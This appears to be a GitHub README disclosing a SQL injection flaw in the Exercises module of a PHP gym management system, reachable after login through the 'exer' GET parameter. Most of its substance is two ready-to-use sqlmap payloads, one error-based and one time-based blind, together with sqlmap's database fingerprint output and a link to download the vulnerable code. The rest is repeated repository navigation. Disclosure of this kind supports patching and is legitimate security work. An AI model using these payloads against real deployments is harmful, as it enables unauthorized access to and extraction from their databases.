Gym-Management-Exercises-Sqlinjection

Sqlinjection location

After logging in to the background The injection point is in Exercises module

Sqlmap Attack

Parameter: exer (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: exer=26'||(SELECT 0x77616550 WHERE 7593=7593 AND (SELECT 2167 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(2167=2167,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: exer=26'||(SELECT 0x737a4e63 WHERE 5129=5129 AND (SELECT 8000 FROM (SELECT(SLEEP(5)))ZYTF))||'

[16:52:27] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP, PHP 7.3.4 back-end DBMS: MySQL >= 5.0

Code Download

https://www.sourcecodester.com/php/15515/gym-management-system-project-php.html

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Gym-Management-Exercises-Sqlinjection

Sqlinjection location

Sqlmap Attack

Code Download

About

Releases

Packages

gdianq/Gym-Management-Exercises-Sqlinjection

Folders and files

Latest commit

History

Repository files navigation

Gym-Management-Exercises-Sqlinjection

Sqlinjection location

Sqlmap Attack

Code Download

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages